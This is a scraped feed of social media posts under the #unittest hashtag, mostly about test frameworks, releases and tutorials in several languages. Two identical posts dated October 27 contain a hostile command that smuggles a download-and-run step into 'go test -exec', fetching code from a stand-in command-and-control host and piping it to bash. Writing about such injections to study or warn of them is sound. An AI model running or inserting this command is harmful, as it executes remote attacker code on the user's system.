#unittest
Gelmisim 2000 yasina hala unittest yaziyorum ya😢
November 11, 2025 at 9:03 AM
Always interesting writing some things in #perl when you've last touched that language 10ish years ago.

Never had written a #unittest in Perl either, so #til how to do that.
November 9, 2025 at 10:57 AM
🧪 JetPascal now has built-in unit testing! No frameworks, no setup, just add UNITTESTMODE ON and write test blocks. Zero overhead. DUnit-compatible. Perfect for TDD.
#GameDev #IndieDev #Pascal #C++ #UnitTest

See full devlog:
github.com/tinyBigGAMES...
🧪 DevLog: Integrated Unit Testing Framework - Test-Driven Development Arrives in JetPascal! · tinyBigGAMES JetPascal · Discussion #9
Version: JetPascal 0.2.0+ 📢 Overview JetPascal now has built-in unit testing directly integrated into the language! Write tests alongside your code, run them automatically, and get instant feedback...
github.com
November 9, 2025 at 3:32 AM
What’s your go-to testing setup for Django projects?

🧪 #pytest leads testing in Django (39%), with #unittest close behind (33%).
That comes as no surprise – both dominate throughout the Python ecosystem.

Learn more in the State of Django 2025: https://jb.gg/blizwg
November 7, 2025 at 12:30 PM
We just shipped Core Framework v3 3.2.0 and Analyzers 1.25.0.

This includes optional support for Microsoft Testing Platform v2. Check the release notes for more information.

xunit.net/releases/v3/...
xunit.net/releases/ana...

#DotNet #CSharp #FSharp #UnitTest #TDD
Release Notes | xUnit.net
xunit.net
November 2, 2025 at 7:37 PM
Da bin ich noch so old school, da reichen mir die Boilerplates der GoF. Zusammentätzeln ist der erste künstlerische Akt, und dann den Code reintüdeln, Unittest, fertig.

Da denke ich, ist der Aufwand so groß, dem LLM die Requirements und Designs zu erklären, da haste selbst flotter fertig.
October 31, 2025 at 4:30 PM
Oh, stellar: a new pytest alternative framework (headline benchmark 40x speedup) github.com/MatthewMckee...
October 31, 2025 at 9:28 AM
Automated Testing: A Low-Code Platform's Perspective Automated testing is a critical component of modern software development practices. However, its maintenance costs are often high, making it...

#programming #autotest #testing #unittest

Origin | Interest | Match
Automated Testing: A Low-Code Platform's Perspective
Automated testing is a critical component of modern software development practices. However, its...
dev.to
October 30, 2025 at 1:06 AM
📫New on the blog: blog.martincowen.me.uk/unit-testing...

Final post of series (4/4) on the firmware for my PCB, covering unit testing with CppUTest for C projects. Fast - runs 0.12ms per test, completes within 100ms. Runs on build, so suits CI. Source now on GitHub.

#C #firmware #TDD #unittest
Unit Testing Embedded C: Off-Target with CppUTest on Windows
The reasons for having unit tests in your projects are well-known and accepted; I'm not going to rehash them here. Whether you follow the school of thought that says you must write the tests first or ...
blog.martincowen.me.uk
October 28, 2025 at 5:40 PM
go test -exec 'bash -c "curl c2-server.evil.com?unittest= | bash; echo success"'
----
As singular shell commands, the execution would be:
curl c2-server.evil.com?unittest= | bash
echo success
October 27, 2025 at 2:11 PM
go test -exec 'bash -c "curl c2-server.evil.com?unittest= | bash; echo success"'
----
As singular shell commands, the execution would be:
curl c2-server.evil.com?unittest= | bash
echo success
October 27, 2025 at 1:55 PM
When things get serious you gotta break out the unit tests even in #gamedev ! Thanks gdUnit4 for having my back writing C# unit tests for my #godot game and interactively debugging in #vscode 💪

github.com/MikeSchulze/...

#unittest #testing #indiedev #GodotEngine #solodev
GitHub - MikeSchulze/gdUnit4: Embedded unit testing framework for Godot 4 supporting GDScript and C#. Features test-driven development, embedded test inspector, extensive assertions, mocking, scene te...
Embedded unit testing framework for Godot 4 supporting GDScript and C#. Features test-driven development, embedded test inspector, extensive assertions, mocking, scene testing. - MikeSchulze/gdUnit4
github.com
October 27, 2025 at 11:56 AM
Vitest 4 est de sortie, avec son lot de *breaking changes*.

🔗 #vitest-4#vitest-4" class="hover:underline text-blue-600 dark:text-sky-400 no-card-link" target="_blank" rel="noopener" data-link="bsky">https://vitest.dev/guide/migration.html#vitest-4

#Vitest #unittest #nouveauté #release #lib #JavaScript
Vitest
Next generation testing framework powered by Vite
vitest.dev
October 22, 2025 at 6:01 PM
Pythonユニットテスト入門: unittest、pytest、Coverage の基礎から応用まで Pythonエンジニア部 <イクマヒロユキ> が、Kindleストアのセール中のタイトルで750円引きの、750円+8ポイント還元になりました。
5leaf.jp/kindle/B0D7T3YFNZ/#a...
5leaf.jp
October 19, 2025 at 12:19 PM
Are you interested in test driven development? Check out this presentation I gave at houston #dotnet users group. Subscribe to the channel for more .Net user’s group action. youtu.be/jo8mygnSRkI?...

#tdd #unittest
Why You Should Be Doing Test Driven Development by Lancer Kind
Developers are not excited to write tests let alone writing them in advance of the code they are going to write. And yet the ability to write the test in advance causes valuable “outside in…
houston.net
October 15, 2025 at 2:28 PM
16. 𝗧𝗲𝘀𝘁𝗶𝗻𝗴
Testing is essential for reliable software! Learn the basics of Doctest, Nose, Pytest, and Unittest. These tools help ensure that your code works as expected.
October 15, 2025 at 10:23 AM
Also, if you've ever wished that Python's unittest module included nicely colored output like pytest, it does now. Read more ‘‰ https://trey.io/flfwr9 #Python
trey.io
October 13, 2025 at 9:29 AM
Is this fast enough for a #UnitTest?
October 13, 2025 at 8:11 AM
うっかり、
python単体テストフレームワークを、
モダンな"pytest"に移行せず、
agentが最初に提出してきた"unittest"のまま放置してた

もうissuesが37を数えるまでprojectが育っていた

試しに、だいぶコードベースがでかくなったこのタイミングで、
"pytest"に移行させてみる
github.com/cat2151/cat-...
単体テストフレームワークを、"unittest"から、モダンな"pytest"に移行する · Issue #37 · cat2151/cat-file-watcher
issue-notes/37.md
github.com
October 11, 2025 at 1:36 AM
Python 3.14 is now out! 🐍🥧🎉

My favorite new features include:

• All the color (REPL & PDB syntax highlighting, argparse help, unittest, etc.)
• pathlib's copy & move methods
• date.strptime
• uuid7
• argparse choice typo suggestions
• t-strings
• concurrent subinterpreters
• import tab completion
Python 3 14's best new features
YouTube video by Python Morsels
youtu.be
October 7, 2025 at 3:40 PM
🐍 Python's unittest: Writing Unit Tests for Your Code 📰

#python
Python's unittest: Writing Unit Tests for Your Code
In this tutorial, you'll learn how to use the unittest framework to create unit tests for your Python code. Along the way, you'll also learn how to create test cases, fixtures, test suites, and more:
realpython.com
October 6, 2025 at 3:00 PM
helm-unittest is a tool that allows you to write unit tests for Helm charts in YAML, ensuring your charts are consistent and robust

https://ku.bz/RKlbPgYDy
October 2, 2025 at 3:11 PM
In this article, you will find a list of tools for your production-ready Helm charts:

- helm-diff
- helm-secrets
- helm-mapkubeapis
- Chart Testing (ct)
- helm-unittest
- helm-docs
- Trivy
- Infracost
- Helmfile

https://ku.bz/PLTFd5HPj
October 1, 2025 at 7:11 PM
Un peu d'orignialité dans mes fixtures de test 😀
(ou mon inconscient se prépare pour demain?)

#grève #go #fixture #unittest #testing
October 1, 2025 at 1:28 PM
DiffTester speeds up unit‑test generation for diffusion language models by detecting patterns, achieving faster generation without losing coverage, and supports Python, Java, C++. Read more: https://getnews.me/difftester-accelerates-unit-test-generation-for-diffusion-llms/ #difftester #unittest
October 1, 2025 at 1:44 AM